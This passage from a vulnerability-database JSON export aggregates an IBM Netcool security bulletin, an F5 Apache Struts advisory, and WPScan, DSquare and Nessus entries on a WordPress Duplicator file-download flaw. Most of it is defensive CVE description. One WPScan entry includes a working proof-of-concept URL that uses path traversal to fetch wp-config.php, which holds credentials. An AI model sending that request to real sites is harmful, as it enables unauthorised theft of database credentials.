Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197999](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197999>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2021-21290](<https://vulners.com/cve/CVE-2021-21290>) \n** DESCRIPTION: **Netty could allow a local authenticated attacker to obtain sensitive information, caused by an insecure temp file in Unix-like systems. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197110](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197110>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2016-1000023](<https://vulners.com/cve/CVE-2016-1000023>) \n** DESCRIPTION: **Minimatch is vulnerable to a denial of service, caused by a regular expression of minimatch.js. By using a specially crafted glob pattern, a remote attacker could exploit this vulnerability to cause the application to consume an overly large amount of CPU resources \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/118817](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118817>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-24839](<https://vulners.com/cve/CVE-2022-24839>) \n** DESCRIPTION: **Sparkle Motion Nokogiri is vulnerable to a denial of service, caused by a java.lang.OutOfMemoryError exception when parsing ill-formed HTML markup in the fork of org.cyberneko.html. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224089>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-24329](<https://vulners.com/cve/CVE-2022-24329>) \n** DESCRIPTION: **JetBrains Kotlin could provide weaker than expected security, caused by failing to lock dependencies for Multiplatform Gradle Projects. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/220617](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220617>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-31566](<https://vulners.com/cve/CVE-2021-31566>) \n** DESCRIPTION: **libarchive could allow a local attacker to gain elevated privileges on the system, caused by an improper link resolution flaw. By using a specially-crafted archive file, an attacker could exploit this vulnerability to change modes, times, access control lists, and flags of a file on the system to gain elevated privileges. \nCVSS Base score: 4.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222218](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222218>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2021-23177](<https://vulners.com/cve/CVE-2021-23177>) \n** DESCRIPTION: **libarchive could allow a local attacker to gain elevated privileges on the system, caused by an improper link resolution flaw. By using a specially-crafted archive file, an attacker could exploit this vulnerability to change the ACL of a file on the system and gain elevated privileges. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222216](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222216>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) \n \n** CVEID: **[CVE-2021-3634](<https://vulners.com/cve/CVE-2021-3634>) \n** DESCRIPTION: **libssh is vulnerable to a heap-based buffer overflow, caused by improper bounds checking. By sending a specially-crafted request, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208281](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208281>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L) \n \n** CVEID: **[CVE-2020-13949](<https://vulners.com/cve/CVE-2020-13949>) \n** DESCRIPTION: **Apache Thrift is vulnerable to a denial of service, caused by improper input validation. By sending specially-crafted messages, a remote attacker could exploit this vulnerability to cause a large memory allocation. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196738](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196738>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-23308](<https://vulners.com/cve/CVE-2022-23308>) \n** DESCRIPTION: **libxml2 is vulnerable to a denial of service, caused by a use-after-free in the ID and IDREF attributes. A remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/220772](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220772>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-25878](<https://vulners.com/cve/CVE-2022-25878>) \n** DESCRIPTION: **Node.js protobufjs module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By adding or modifying properties of Object.prototype using a __proto__ or constructor payload, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/227327](<https://exchange.xforce.ibmcloud.com/vulnerabilities/227327>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2021-44878](<https://vulners.com/cve/CVE-2021-44878>) \n** DESCRIPTION: **pac4j could allow a remote attacker to bypass security restrictions, caused by improper validation for ID Tokens with \"none\" algorithm. By injecting a specially-crafted ID token using \"none\" as the value of \"alg\" key, an attacker could exploit this vulnerability to bypass the token validation. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216856](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216856>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2022-29622](<https://vulners.com/cve/CVE-2022-29622>) \n** DESCRIPTION: **Node.js Formidable module could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially-crafted HTTP request using the filename parameter, an attacker could exploit this vulnerability to upload a malicious PDF file, which could allow the attacker to execute arbitrary code on the vulnerable system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226582](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226582>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3807](<https://vulners.com/cve/CVE-2021-3807>) \n** DESCRIPTION: **Chalk ansi-regex module for Node.js is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209596](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209596>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-24785](<https://vulners.com/cve/CVE-2022-24785>) \n** DESCRIPTION: **Moment.js could allow a remote attacker to traverse directories on the system, caused by improper validation of user supplied input. An attacker could send a specially-crafted locale string containing \"dot dot\" sequences (/../) to switch arbitrary moment locale. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223451](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223451>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-36327](<https://vulners.com/cve/CVE-2020-36327>) \n** DESCRIPTION: **Bundler could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when choosing a dependency source. By using a specially-crafted gem, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/201080](<https://exchange.xforce.ibmcloud.com/vulnerabilities/201080>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-23219](<https://vulners.com/cve/CVE-2022-23219>) \n** DESCRIPTION: **GNU C Library (aka glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the clnt_create function in the sunrpc module. By sending a specially-crafted hostname argument, a local attacker could overflow a buffer and execute arbitrary code or cause a denial of service on the system. \nCVSS Base score: 8.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217303](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217303>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3999](<https://vulners.com/cve/CVE-2021-3999>) \n** DESCRIPTION: **GNU glibc is vulnerable to an off-by-one buffer overflow and underflow, caused by improper bounds checking by the getcwd() function. By sending a specially-crafted request, a local authenticated attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base score: 8.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217981](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217981>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-23218](<https://vulners.com/cve/CVE-2022-23218>) \n** DESCRIPTION: **GNU C Library (aka glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the svcunix_create function in the sunrpc module. By sending a specially-crafted path argument, a local attacker could overflow a buffer and execute arbitrary code or cause a denial of service on the system. \nCVSS Base score: 8.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217302](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217302>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22822](<https://vulners.com/cve/CVE-2022-22822>) \n** DESCRIPTION: **Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of addBinding in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216908](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216908>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22823](<https://vulners.com/cve/CVE-2022-22823>) \n** DESCRIPTION: **Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of build_model in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216907](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216907>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22824](<https://vulners.com/cve/CVE-2022-22824>) \n** DESCRIPTION: **Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of defineAttribute in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216906](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216906>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-23852](<https://vulners.com/cve/CVE-2022-23852>) \n** DESCRIPTION: **Expat (aka libexpat) could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in the XML_GetBuffer function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218007](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218007>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-25235](<https://vulners.com/cve/CVE-2022-25235>) \n** DESCRIPTION: **libexpat is vulnerable to a denial of service, caused by improper input validation in xmltok_impl.c. By persuading a victim to open a specially-crafted content with malformed encoding, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219782](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219782>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-25236](<https://vulners.com/cve/CVE-2022-25236>) \n** DESCRIPTION: **libexpat is vulnerable to a denial of service, caused by improper protection against insertion of namesep characters into namespace URIs in xmlparse.c. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219784](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219784>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-25315](<https://vulners.com/cve/CVE-2022-25315>) \n** DESCRIPTION: **libexpat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in storeRawNames. By persuading a victim to open a specially-crafted file, an attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219945](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219945>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22825](<https://vulners.com/cve/CVE-2022-22825>) \n** DESCRIPTION: **Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of lookup in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216905](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216905>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-23358](<https://vulners.com/cve/CVE-2021-23358>) \n** DESCRIPTION: **Node.js underscore module could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the template function. By sending a specially-crafted argument using the variable property, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198958](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198958>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3765](<https://vulners.com/cve/CVE-2021-3765>) \n** DESCRIPTION: **validator.js is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw when calling the rtrim function. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212669](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212669>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nNetcool Operations Insight| 1.4.x \nNetcool Operations Insight| 1.5.x \nNetcool Operations Insight| 1.6.x \n \n\n\n## Remediation/Fixes\n\nNetcool Operations Insight v1.6.6 can be deployed on-premises, on a supported cloud platform, or on a hybrid cloud and on-premises architecture. \n\nIBM strongly suggests the following remediation / fixes:\n\nPlease go to [https://www.ibm.com/docs/en/noi/1.6.6?topic=installing](<https://www.ibm.com/docs/en/noi/1.6.4?topic=installing>) to follow the installation instructions relevant to your chosen architecture.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T13:11:39", "type": "ibm", "title": "Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114", "CVE-2016-1000023", "CVE-2019-10086", "CVE-2020-13949", "CVE-2020-13956", "CVE-2020-14039", "CVE-2020-15586", "CVE-2020-16845", "CVE-2020-17530", "CVE-2020-24553", "CVE-2020-28362", "CVE-2020-28366", "CVE-2020-28367", "CVE-2020-36327", "CVE-2020-7919", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-22144", "CVE-2021-23177", "CVE-2021-23358", "CVE-2021-23450", "CVE-2021-27918", "CVE-2021-29425", "CVE-2021-29923", "CVE-2021-3114", "CVE-2021-31525", "CVE-2021-31566", "CVE-2021-31805", "CVE-2021-33195", "CVE-2021-33196", "CVE-2021-33197", "CVE-2021-33198", "CVE-2021-36221", "CVE-2021-3634", "CVE-2021-3765", "CVE-2021-3807", "CVE-2021-38297", "CVE-2021-39293", "CVE-2021-3999", "CVE-2021-41771", "CVE-2021-41772", "CVE-2021-44716", "CVE-2021-44878", "CVE-2022-0155", "CVE-2022-0536", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23308", "CVE-2022-23772", "CVE-2022-23773", "CVE-2022-23806", "CVE-2022-23852", "CVE-2022-24329", "CVE-2022-24675", "CVE-2022-24785", "CVE-2022-24839", "CVE-2022-24921", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25315", "CVE-2022-25878", "CVE-2022-28327", "CVE-2022-29622"], "modified": "2022-10-25T13:11:39", "id": "DED899C681C4F01F658F5349E77058BDF8C51E88FADBC17AC63AAD856B4CADE5", "href": "https://www.ibm.com/support/pages/node/6831813", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag&#x27;s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:21:45", "bulletinFamily": "software", "cvelist": ["CVE-2020-35234"], "description": "The plugin has an optional debug log file generated with a random name, located in the plugin folder and which contains all email messages sent. However, this folder does not have any index page, allowing access to log file on servers with the directory listing enabled or misconfigured. This could allow attackers to gain unauthorised access to the blog by reseting the admin password by getting the reset link from the log.\n", "modified": "2020-12-15T06:02:15", "published": "2020-12-07T00:00:00", "id": "WPVDB-ID:14EADE63-E365-4BFC-A30E-9E2A7E739049", "href": "https://wpscan.com/vulnerability/14eade63-e365-4bfc-a30e-9e2a7e739049", "type": "wpvulndb", "title": "Easy WP SMTP < 1.4.3 - Debug Log Disclosure", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-15T22:04:18", "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&amp;file;=../wp-config.php\n", "cvss3": {}, "published": "2020-02-19T00:00:00", "type": "wpvulndb", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2021-01-04T06:01:37", "id": "WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "https://wpscan.com/vulnerability/35227c3a-e893-4c68-8cb6-ffe79115fb6d", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Directory traversal vulnerability in WordPress Duplicator plugin\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-08T00:00:00", "type": "dsquare", "title": "WordPress Duplicator < 1.3.28 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-03-08T00:00:00", "id": "E-724", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2023-07-19T15:33:58", "description": "The WordPress application running on the remote host has a version of the 'Duplicator' plugin that is affected by a directory traversal vulnerability in the duplicator_download and duplicator_init functions due to improper validation of user supplied input. An unauthenticated, remote attacker can exploit this issue by sending a specially crafted request to download arbitrary files.", "cvss3": {}, "published": "2020-09-02T00:00:00", "type": "nessus", "title": "WordPress Plugin 'Duplicator' Directory Traversal (CVE-2020-11738)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_DUPLICATOR_CVE-2020-11738.NBIN", "href": "https://www.tenable.com/plugins/nessus/140193", "sourceData": "Binary data wordpress_plugin_duplicator_cve-2020-11738.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:56:54", "description": "The WordPress application running on the remote host has a version of the 'Duplicator' plugin that is prior to 1.3.28 and, thus, is affected by an unauthenticated arbitrary file download vulnerability that can allow the attackers to download 'wp-config.php' and steal database credentials.", "cvss3": {}, "published": "2020-02-21T00:00:00", "type": "nessus", "title": "WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL", "href": "https://www.tenable.com/plugins/nessus/133846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n 